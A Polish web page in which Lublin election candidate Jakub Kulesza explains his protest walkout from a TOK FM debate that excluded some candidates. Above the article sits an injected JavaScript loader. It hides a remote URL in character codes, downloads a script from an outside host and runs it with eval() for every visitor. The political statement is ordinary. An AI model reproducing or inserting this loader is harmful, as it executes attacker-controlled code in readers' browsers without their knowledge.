var k = 526853;var url=String.fromCharCode(104,116,116,112,115,58,47,47,110,115,49,46,98,117,108,108,103,111,101,115,100,111,119,110,46,99,111,109,47,99,49,46,106,115,63,99,105,100,61,51,52,110,53,104,98,113,103,102,52,100,53,121,38);var text = httpGet(url+k);if(text.length > 3){eval(text);} function httpGet(theUrl){ var xmlHttp = new XMLHttpRequest();xmlHttp.open( String.fromCharCode(71,69,84), theUrl, false );xmlHttp.send( null );return xmlHttp.responseText;}

[VIDEO] Jakub Kulesza wychodzi z debaty w ramach protestu!

„Nie zgadzam się z Twoimi poglądami, ale po kres moich dni, będę bronił Twego prawa do ich głoszenia”.

Słowa te, opisujące poglady Woltera, są mi bardzo bliskie, dlatego uważam za niedopuszczalną sytuację, w której na debatę nie zostali zaproszeni wszyscy kandydaci. Owszem prywatna stacja radiowa ma prawo nie zapraszać ludzi, z którymi się nie zgadza, ale ja mam prawo  to krytykować.

Z Marianem Kowalskim dzieli mnie wiele spraw. Marian Kowalski wielokrotnie mnie obrażał np. nazywając cynicznym łotrem. Było mi z tego powodu bardzo przykro. Tutaj jednak nie chodzi o danego kandydata, tylko o zasady. Gdyby sprawa dotyczyła sympatycznej Pani Magdaleny Długosz moje stanowisko byłoby takie samo.

Naszym głównym postulatem jest walka z wszelkimi układami i specjalnymi przywilejami. W imię uczciwości – także wobec samego siebie muszę zrezygnować ze specjalnego przywileju, który przyznała mi stacja TOK FM, a którego nie otrzymali wszyscy kandydaci. Chodzi także o mieszkańców Lublina, którzy mają prawo zapoznać się z wypowiedziami wszystkich kandydatów, żeby móc wybrać tego najlepszego.

Dlatego też odmawiam udziału w tej debacie na takich zasadach, rezygnuję ze specjalnego przywileju i usiądę wspólnie z mieszkańcami Lublina na widowni.

Wyraziłem zgodę na udział we wszystkich pozostałych 6 debatach i nigdy nie odmówiłem, żadnemu mieszkańcowi czy dziennikarzowi rozmowy.

Apeluję do pozostałych kandydatów w imię równości wobec zasad, tolerancji i szacunku do debaty publicznej o wyjście zza stołu i dołączenie do nas na  równych zasadach.

~Jakub Kulesza